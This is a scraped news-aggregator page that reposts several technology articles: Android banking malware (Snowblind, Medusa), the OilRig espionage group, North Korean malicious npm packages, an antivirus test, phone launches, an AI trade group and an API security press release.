Snowblind is a new Android banking malware abusing a safety tool

andreasc
-
0
Snowblind is a new Android banking malware abusing a safety tool
[ad_1]

Mobile app security provider Promon has uncovered a never-before-seen Android banking malware. Dubbed Snowblind, it uses a novel technique to exploit Android OS functionalities and compromise banking apps. The firm says the malware is effective on all Android devices, including the best ones with the strongest security measures. It requires app-level security enhancements to nullify potential financial loss.

Snowblind is a first-of-its-kind Android banking malware

Snowblind appears to be one of the most advanced Android banking malware with novel anti-detection techniques. According to Promon, the malware manipulates a Linux kernel safety feature built into Android OS called “seccomp” (secure computing). The feature “controls what an app is allowed to do by limiting the system calls, or requests, an application can make from the operating system.”

Like most other malware, Snowblind relies on exploiting accessibility services to gain system-level access to an infected device and perform malicious activities without the user’s knowledge. However, since Android has security measures in place to detect malicious accessibility services, it modifies apps to prevent detection. It “performs a normal repackaging attack” with a lesser-known technique based on seccomp.

Promon says Snowblind’s technique abuses the seccomp functionality “to intercept and manipulate system calls,” which enables it to bypass security checks and anti-tampering mechanisms. This allows the attackers to stealthily execute malicious activities on the device. They can use other functions of the malware to steal login credentials for a banking app and make unauthorized transactions.

To make their work easier, Snowblind can disable security features such as two-factor authentication (2FA) and biometric verification. It can also exfiltrate sensitive personally identifiable information and transaction data from the app. This data can be exploited later for fraudulent activities, including impersonation. Since Snowblind attacks the app itself, it is effective on all modern Android devices.

Snowblind Android banking malware

Snowblind’s technique is new, so most apps are vulnerable

The security firm discovered that the Snowblind Android malware is currently designed to specifically target banking Android apps in Southeast Asia. However, the firm found its seccomp-based technique “more interesting than the malware itself,” so much so that threat actors may soon devise more types of exploits and attacks. To make the matter worse, it’s a new technique and most modern apps lack protection against it.

Promon says it has developed protective measures against Snowblind and other potential variants of seccomp-based attacks and malware strains. Version 6.5.2 or newer of its Promon SHIELD platform offers these protections. Developers can employ the solution to keep their apps safe. For end users, these types of powerful banking malware are a reminder that we shouldn’t install apps from unknown sources. Never download files from shady websites or via forwarded links. Always visit the official website of a developer or an official app store to download apps.


[ad_2]
Source link

A new AI trade group will help push AI regulations in the U.S.

andreasc
-
0
A new AI trade group will help push AI regulations in the U.S.
[ad_1]

Right now, it’s the Wild West on the AI landscape. We’re still waiting for actual laws and regulations regarding the technology. It’s been almost two years since ChatGPT hit the scene, so we’re overdue for some sort of structure. According to a new report, several entities banded together to form an AI trade group.

Right now, there are lawsuits floating around regarding AI technology. The New York Times is suing OpenAI and Microsoft for copyright infringement. Also, several top record labels are suing AI music generators for much the same reason. We’re still waiting for the results from those cases. The results from those cases could have an effect on the AI market as a whole.

Several content licensing companies have developed an AI trade group

Rightsify, vAIsual, Pixta, and Datarade are some of the companies involved in this new trade AI trade group. This will help advocate for the ethical sourcing of data to train AI models. Together, they formed the Dataset Providers Alliance (DPA). A big part of what the alliance will be doing will focus on pushing for legislation to go through regarding the use of AI.

For example, the DPA will push for the NO FAKES ACT to pass in the U.S. This is the bill that forbids entities from using digital copies of people’s likeness or voice. We’ve seen examples of this, and celebrities are the main target.

Along with that, the DPA will push for companies to be more transparent about how they’re sourcing and using the data they get. According to Alex Bestall, CEO of Rightsify and GCX, the alliance plans to release a white paper in July.

This is just the kind of thing that the AI space needs. Right now, there’s no telling how many people have had their content scraped to train AI models without their consent. There’s nothing that the average Joe can do because large trillion-dollar companies like Google are always going to have their way. So, it’s important that we have alliances like these to help even the playing field.


[ad_2]
Source link

Strava starts rolling out Dark Mode to its Android and iOS apps

andreasc
-
0
Strava starts rolling out Dark Mode to its Android and iOS apps
[ad_1]
Strava announced last month a bunch of improvements coming to its app in the next few months including a dark mode, AI tools, as well as a new Family Plan subscription, the sister of the company’s Student Plan.

While the of the new features have already been implemented, it took Strava about slightly more than a month to bring the promised Dark mode to its Android and iOS apps (via 9to5google).

One of Strava’s most requested features, Dark mode promises to improve the in-app experience for all users. Obviously, the biggest benefit of having Dark mode enabled is the reduction in eye strain, but the functionality also improves accessibility while scrolling through the feed.

Strava users have a couple of options at their disposal when choosing the right Dark mode setting. For instance, the integration comes with “Always Dark” and “Always Light” toggles, as well as the option to match your device’s settings.

In other news, Strava users should prepare for a wave of AI-oriented features, such as the AI-enabled Leaderboard Integrity, which promises to “harness machine learning to automatically flag irregular, improbable, or impossible activities recorded to the platform.”

Strava says that this leaderboard has been trained by millions of activities and its aim is to make users enjoy their time spend on the platform without having the feeling that they’ve been cheated by other users.

Other important new improvements coming to Strava include features like Night Heatmaps, Quick Edit, and Strive for More. Night Heatmaps only show activities between sundown and sunrise, while Quick Edit allows Strava users to make edits – like activity name, privacy settings – on the fly.

Last but not least, Strive for More is a program that aims to promote and support women in movement and sport. In this regard, Strava announced last month a partnership with TOGETHXR to encourage women to watch and play women’s sports.


[ad_2]
Source link

OilRig Hackers Attacking Individuals And Organizations In The Middle East

andreasc
-
0
OilRig Hackers Attacking Individuals And Organizations In The Middle East
[ad_1]

OilRig is an Iranian-linked cyber espionage group that has been active since 2015, and this group is known for its sophisticated spear-phishing campaigns and advanced infiltration techniques. 

This group conducts a multitude of cyber attacks against various sectors, and among them, the most executed ones are intelligence gathering, surveillance, and high-profile cyberattacks.

Besides this, cybersecurity researchers at Cyble recently identified that OilRig hackers have been actively attacking Middle Eastern entities and organizations related to Iranian interests. 

The group continually evolves its tools to evade detection and has expanded its operations to include disruptive attacks like ransomware and data-wiping.

Free Webinar on API vulnerability scanning for OWASP API Top 10 vulnerabilities -> Book Your Spot

OilRig Hackers Attacking Individuals

OilRig targets over 20 countries across various regions:-

Origin and Targeted Countries (Source – Cyble)

It attacks diverse sectors including:-

  • Aerospace & Defense 
  • BFSI 
  • Chemicals 
  • Education 
  • Energy & Utilities 
  • Government & LEA 
  • Hospitality 
  • IT & ITES 
  • Technology 
  • Telecommunication 

The group employs customizable attack vectors, often starting with spear-phishing or exploiting public-facing applications to deliver malware for data exfiltration. 

OilRig is suspected to have links with Greenbug and is known for exploiting unpatched SharePoint servers. Its extensive reach and adaptable tactics make it a significant threat in the cyber espionage landscape.

The group OilRig made use of LinkedIn-based phishing masquerading as Cambridge University Members and exploited already known vulnerabilities like CVE-2019-0604 and CVE-2017-11882.

LinkedIn Message Asking to Download File (Source – Cyble)

For persistence, OilRig uses malicious loaders, VBScript, or scheduled tasks. Their arsenal also includes various RATs like Alma Communicator and BONDUPDATER, among others.

The group also employs living-off-the-land tactics to attack public-facing applications in their operations, as the Cyble report reads.

They do so by linking IPs and domains from previous attacks, which helps them illuminate the group’s development as a continuous threat touching many sectors.

Here below we have mentioned all the tools used:-

  • Alma Communicator
  • BONDUPDATER
  • Clayslide
  • DistTrack
  • DNSExfitrator
  • DNSpionage
  • Dustman
  • Fox Panel
  • Helminth
  • ISMAgent
  • ISMDoor
  • ISMInjector
  • Karkoff
  • Mimikatz
  • LaZagne
  • LIONTAIL
  • LONGWATCH
  • SideTwist
  • Neuron
  • Nautilus
  • PICKPOCKET
  • Plink
  • PsList
  • RDAT
  • Saitama
  • SpyNote RAT
  • TONEDEAF

OilRig is a group of elite hackers who are experts in cyber espionage. They specialize in secret C&C communication using various methods.

They have developed targeted exchange servers, HTPSnoop implants, HTTP and DNS queries, and protocol tunneling for stealthy network communications.

Recommendations

Here below we have mentioned all the recommendations:-

  • Regular software patching
  • Enhanced email security
  • Robust network monitoring
  • Advanced endpoint protection
  • Strict access control
  • Comprehensive incident response plan
  • Utilize threat intelligence
  • Ongoing employee cybersecurity training

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free


[ad_2]
Source link

Leaked Galaxy Z Fold 6 & Flip 6 prices raise eyebrows

andreasc
-
0
Leaked Galaxy Z Fold 6 & Flip 6 prices raise eyebrows
[ad_1]

As expected, Samsung announced its next Unpacked today. The big launch event will take place on July 10 in Paris, France. Leaks have already revealed what the company has in store. It will unveil new foldables, watches, earbuds, and more. As we wait for the event, a fresh leak has disclosed the alleged prices of the Galaxy Z Fold 6 and Galaxy Z Flip 6, along with their storage variants and color options.

Galaxy Z Fold 6 & Flip 6 prices leaked again, but they may not be accurate

A few weeks ago, we got word that Samsung will increase the prices of its next-gen foldables. Both the Galaxy Z Fold 6 and Galaxy Z Flip 6 were said to cost about $100 more than their respective predecessors in the US, putting their starting prices at $1,900 and $1,100. The latest leak now gives us European prices of the upcoming foldables. Unsurprisingly, Samsung is charging more in Europe too.

However, before diving deeper, let us tell you that the alleged prices seem a little off. The report says the new Fold will see a price jump of a whopping €300 across the board. This may not be true. The upcoming book-style foldable doesn’t have anything that warrants such a massive price hike. The Flip’s reported price hike of €130 is more reasonable, but we’d still advise you to take this information with some caution.

This being said, let us break down the prices. Samsung will reportedly price the 256GB Galaxy Z Fold 6 at €2,200 in Europe, up €300 from €1,900. Likewise, its 512GB storage model costs €2,330 instead of €2,040 and the 1TB model costs €2,580 instead of €2,280. All three storage variants will have 12GB of RAM—there is no 16GB RAM option for the phone. Color options include Silver, Pink, and Navy.

Coming to the Galaxy Z Flip 6, Samsung is upgrading it to 12GB RAM with 256GB and 512GB storage options, priced at €1,330 and €1,450, respectively. These prices are €130 more than the Flip 5’s €1,199 and €1,319. The device has more notable hardware upgrades—RAM boost, new primary rear camera (50MP), and bigger battery (4,000mAh)—so this price hike may be justified. It comes in Blue, Mint, and Silver Shadow colors.

You can already pre-reserve the upcoming foldables

Samsung has already started accepting pre-reservations for the Galaxy Z Fold 6 and Galaxy Z Flip 6. You can reserve either foldable before July 10 to get a $50 credit that you can redeem on Samsung’s online store when purchasing the device. However, if the leaked prices are accurate, the foldable duo could be a tough buy. You might be better off picking up the 2023 model at a discount, or perhaps grabbing one from some other brand. The foldable market has no shortage of options.


[ad_2]
Source link

New North Korean Actor Distributing Malicious NPM Packages

andreasc
-
0
New North Korean Actor Distributing Malicious NPM Packages
[ad_1]

Early in 2024, North Korean threat actors persisted in using the public npm registry to disseminate malicious packages that were similar to those that Jade Sleet had previously used. 

Initially thought to be an extension of Sleet’s activity, further investigation revealed a new threat actor targeting the open-source ecosystem through the npm registry, highlighting the ongoing risk posed by North Korean actors despite heightened awareness within the security community. 

Timeline

A new North Korean threat actor, Moonstone Sleet, leverages the open-source software supply chain vulnerability by distributing malware through malicious packages on the public npm registry.

Free Webinar on API vulnerability scanning for OWASP API Top 10 vulnerabilities -> Book Your Spot

This tactic, which is comparable to that of other North Korean actors like Jade Sleet, exposes developers to potential compromise and emphasizes the ongoing threat that state-sponsored actors pose to the integrity of the open-source ecosystem. 

Microsoft has identified a new North Korean threat actor, Moonstone Sleet, that uses various tactics (TTPs) for financial gain and espionage, which overlap with other North Korean actors but also include unique methods. 

Malicious Payload Execution 

Similar to techniques reported by Phylum, Moonstone Sleet distributes malicious npm packages through both targeted freelancing platforms and the public npm registry, which expands their reach and increases the chance of unsuspecting developers installing their malware.  

An analysis of malicious npm packages by Checkmarx reveals distinct code styles between those linked to Jade Sleet (Spring/Summer 2023) and Moonstone Sleet (Late 2023/Early 2024), while Jade Sleet’s packages employed a two-part strategy to evade detection. 

The first, published under a separate account, created a directory and fetched updates from a remote server, establishing the infrastructure for the second package, likely containing the malicious payload, to execute on the compromised machine. 

code of the first package in the pair 

The second package in the pair acts as a downloader and executor, which retrieves a token from a file created by the first package and uses it to download malicious code from a specific URL, which is then written to a new file on the victim’s machine and executed as a Node.js script, unleashing its malicious functionality. 

Code of second package in pair 

The two-package approach is a shift from the single-package method used in late 2023 and early 2024, where the payload was directly encoded and executed upon installation.

The attackers seem to be refining their technique by using a separate downloader to potentially evade detection while maintaining the core malicious functionality.  

Attackers are using malicious open-source packages to deliver payloads, which download a file, decrypt it using a simple XOR, rename it, and execute it via rundll32 on Windows. 

To evade detection, the package self-cleans by deleting temporary files and replacing its malicious code with a clean version, while the attack evolved in Q2 2024, with packages becoming more complex, using obfuscation, and targeting Linux systems as well.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free


[ad_2]
Source link

Malwarebytes Premium stops 100% of malware during AV Lab test

andreasc
-
0
Malwarebytes Premium stops 100% of malware during AV Lab test
[ad_1]

Malwarebytes Premium has maintained its long-running, perfect record in protecting users against online threats by blocking 100% of the malware samples deployed in the AV Lab Cybersecurity Foundation’s “Advanced In-The-Wild Malware Test.”

For its performance in the May 2024 evaluation, Malwarebytes Premium also received a certificate of “Excellence.”

According to AV Lab, such certificates “are granted to solutions that are characterized by a high level of security, with a rating of at least 99% of blocked threats in the Advanced In-The-Wild Malware Test.”

Every two months, the cybersecurity and information security experts at AV Lab construct a series of tests to compare cybersecurity vendors against the latest malware that is currently being used by adversaries and threat actors.

For the May evaluation, AV Lab tested 521 unique malware samples against 13 cybersecurity products. Malwarebytes Premium Security detected 521/521 malware samples, with a remediation time of 44 seconds—well below the 52-second average determined by AV Lab in its most recent testing.

Three cybersecurity vendors failed to block 100% of malware tested: ESET, F-Secure, and Panda.

To ensure that AV Lab’s evaluations reflect current cyberthreats, each round of testing follows three steps:

  1. Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints.
  1. Simulating a real-world scenario in testing: To recreate how a real-life cyberattack would occur, AVLab uses the Firefox web browser to engage with the known, malicious URLs collected in the step prior. In the most recent test, AVLab emphasized the potential for these URLs to be sent over instant messaging platforms, including Discord and Telegram.
  1. Incident recovery time assessment: With the various cybersecurity products installed, AVLab measures whether the evaluated product detects a malware sample, when it detects a sample, and how long it took to detect that sample. The last metric is referred to as “Remediation Time.”

Malwarebytes is proud to once again achieve a 100% score with AVLab’s Advanced In-The-Wild Malware Test, a trusted resource that proves our commitment to user safety.


[ad_2]
Source link

Moto G85 launches under the shadow of Motorola’s new foldables

andreasc
-
0
Moto G85 launches under the shadow of Motorola’s new foldables
[ad_1]

Motorola announced two new flip phones, but that’s not all. A budget phone arrived with them too, the Motorola Moto G85. The thing is, this phone did not launch in the US with the Motorola Razr+ 2024 and Razr 2024.

The Motorola Moto G85 is now official in both Europe and China

The Moto G85 launched in Europe and China. It’s called the Moto S50 Neo in China, actually. This is a budget smartphone, and chances are it won’t be making its way to the US… but it remains to be seen.

The Moto G85 does look really nice, however. It has a curved display with thin bezels and a centered display camera hole. Two vertically-aligned cameras are included on the back. They are located in the top-left corner, and that camera island does blend really well with the rest of the phone’s back.

This smartphone includes a 6.7-inch fullHD+ (2400 x 1080) pOLED display. That is a 10-bit display with a 120Hz refresh rate and a 360Hz touch sampling rate. It offers up to 1,600 nits of brightness.

Motorola Moto G85 image 3

Qualcomm’s mid-range chip fuels the device

The Snapdragon 6s Gen 3 fuels this phone, Qualcomm’s 6nm chip. Motorola included 12GB of RAM here, and 512GB of internal storage. In China, more RAM and storage options are available. Do note that the storage is also expandable.

A 5,000mAh battery sits inside the device, and 30W fast charging is supported. Android 14 comes pre-installed, with Motorola’s skin, while there are two nano SIM card slots included and a separate microSD card slot.

A 50-megapixel main camera (Sony’s IMX882 sensor, f/1.8 aperture, OIS) sits on the back, along with an 8-megapixel ultrawide unit (f/2.2 aperture, macro, depth camera). A single 32-megapixel unit (f/2.45 aperture) sits on the front.

It is water resistant, and has an in-display fingerprint scanner

The phone does include a set of stereo speakers, and Dolby Atmos is also supported. Two microphones are included on the phone, while the device is IP54 rated for water resistance. Bluetooth 5.1 is also supported, while the phone has an in-display fingerprint scanner too.

The Moto G85 measures 161.91 x 74.06 x 7.59mm, while it weighs 171 grams. There’s vegan leather on its back, by the way, but one additional variant will be available too, probably with glass on the back, we’re still not sure.

Motorola Moto G85 image 2


[ad_2]
Source link

Medusa Android banking trojan returns to the US with new capabilities

andreasc
-
0
Medusa Android banking trojan returns to the US with new capabilities
[ad_1]

After nearly a year of lying low, the Medusa banking trojan for Android has resurfaced on security researchers’ radar. Cybersecurity firm Cleafy Threat Intelligence recently detected fresh campaigns targeting users in Europe and North America, including the US. The attackers have deployed more compact variants of the malware, allowing them to operate more stealthily.

New Medusa banking trojan campaigns pose grave threats to Android users

Medusa, aka TangleBot, is an Android banking trojan operating as a malware-as-a-service (MaaS). Discovered in 2020, the malware provides attackers with powerful tools to remotely initiate unauthorized financial transactions from infected phones. It boasts features such as keylogging—it can track key presses when you type, allowing threat actors to steal logging credentials. The malware can also control the screen and manipulate text messages.

The latest Medusa Android banking trojan campaigns began in May 2024, or at least that is when Cleafy researchers started tracking the new activities. This is the first activity of the trojan since July 2023, the cybersecurity firm reports. As pointed out by Bleeping Computer, the banking trojan is different from “the ransomware gang and the Mirai-based botnet for distributed denial-of-service (DDoS) attacks” of the same name (Medusa).

According to Cleafy, the new campaigns deploy upgraded variants of the banking trojan. These variants are more compact and require fewer permissions to perform the same malicious activities on an infected Android phone. They also boast new features such as full-screen overlaying and screenshot capturing, which make the trojan more powerful than ever. It can initiate fraudulent transactions directly from the device without the user’s knowledge.

Clefy discovered the activities of the Medusa banking trojan in Canada, France, Italy, Spain, Turkey, the UK, and the US. The criminal minds behind the campaigns rely on smishing (SMS phishing) to trick Android users into side-loading the malware. They distributed the malware through dropper apps, with the security firm identifying 24 campaigns delivering malicious apps via five separate botnets (UNKN, AFETZEDE, ANAKONDA, PEMBE, and TONY).

Dropper apps include a fake Chrome browser

Among the dropper apps used in these Medusa banking trojan campaigns are a fake Chrome browser and a fake streaming app called 4K Sports. The latter appears to be a well-planned bait as the UEFA EURO 2024 football/soccer championship is currently underway in Europe. Unsuspecting users would install it hoping to watch the championship live on their phone, only to potentially fall prey to devastating malware attacks that could wipe out their bank accounts.

Medusa Android banking trojan 2

Despite a reduced footprint—the malware authors removed 17 commands and several permission requests from the previous version—Medusa banking trojan still requires access to Android’s Accessibility Services and retains its capability to send text messages and access the contact list. Overall, it has become more powerful and more difficult to detect. The malware’s target scope has gotten bigger, potentially opening it up to wider deployment.

As of this writing, Cleafy Threat Intelligence hasn’t discovered any dropper app for the Medusa banking trojan on the Google Play Store. Google’s security measures seem to be doing their work effectively. This means you are safe as long as you don’t download and install dubious apps from the web, particularly from links received in messages from unknown numbers. You should download apps only from official app stores and official company websites.

Medusa Android banking trojan 1


[ad_2]
Source link

FireTail Unveils Free Access for All to Cutting-Edge API Security Platform

andreasc
-
0
FireTail Unveils Free Access for All to Cutting-Edge API Security Platform
[ad_1]

McLean, United States of America, June 26th, 2024, CyberNewsWire

  • FireTail announces a free version of its enterprise-level API security tools, making them accessible to developers and organizations of all sizes.
  • FireTail’s unique combination of open-source code libraries, inline API call evaluation, security posture management, and centralized audit trails helps eliminate vulnerabilities and protect APIs in real-time.
  • The free plan covers up to 5 APIs, includes 1M API call logs per month, offers 7 days of data retention, and provides clear developer support.

FireTail, a disruptor in API security, unveils free access for all to its cutting-edge API security platform. This initiative opens the door for developers and organizations of any size to access enterprise-level API security tools. 

Today, over 80% of all internet traffic is computer-to-computer communication via APIs. Every mobile app, IoT device, and most modern software applications use APIs, creating a broad attack surface for potential threats. FireTail’s hybrid approach to API security blends open-source code libraries with a feature-packed cloud platform and equips businesses with a unique suite of tools to eliminate API vulnerabilities and provide robust runtime API protection. 

“API security is essential for modern applications, and every developer and tech team should have access to effective security tools,” said Jeremy Snyder, CEO and Co-Founder of FireTail. “Security through obscurity is no longer a viable approach. We’re on a mission to secure all of the world’s APIs and our new free plan ensures ongoing access to an API security platform that delivers genuine insight into the most pressing attack vectors – design flaws in APIs. It’s perfect for smaller organizations striving for stronger API protection, and a great way for individuals or teams within larger organizations to get started.”

Riley Priddle, Co-Founder and CTO at FireTail, added, “We’re excited to help organizations of all sizes to better protect their APIs. We want FireTail to become the de facto standard when it comes to API security. Just because you have a small number of APIs, it doesn’t mean they aren’t critical. We want everyone to have access to the best, enterprise-level API security tools. That’s why we offer both this free tier, as well as our open source libraries.”

For developers and small to medium-sized organizations needing to secure up to 5 APIs, FireTail’s free tier includes comprehensive API security features such as discovery, inventory, assessment, detection and response, and inline runtime protection. Key features include:

  • Protection for up to 5 APIs
  • 1M API calls per month
  • 7 days of logging retention

Thomas Martin, Founder at NephoSec, shared “We’ve been working with FireTail from the outset as both a customer and a distribution partner. Having proven that the platform works for even the largest enterprises with the most complex API security requirements, it’s great to see the team opening that technology up to everyone. This will enable us to solve API security challenges for organizations of all shapes and sizes.”

To access the FireTail API security platform, users can visit https://www.firetail.app or join the team on Tuesday, July 2nd for an in-depth look at what FireTail’s free tier can do.

About FireTail

FireTail allows customers to solve all the most critical problems facing APIs today with a hybrid approach, bringing together cloud, application and code with full blocking capabilities to solve the root causes of API data breaches – flaws at the application and business logic layer in authentication, authorization and data handling. Headquartered in McLean, VA, with offices in Dublin, Ireland, and Helsinki, Finland, FireTail is backed by leading investors, including Paladin Capital, Zscaler, General Advance, and SecureOctane. Users can learn more at https://www.firetail.io.

Contact

Marketing Director
Alan Fagan
FireTail
[email protected]


[ad_2]
Source link
1...798081...1,452Page 80 of 1,452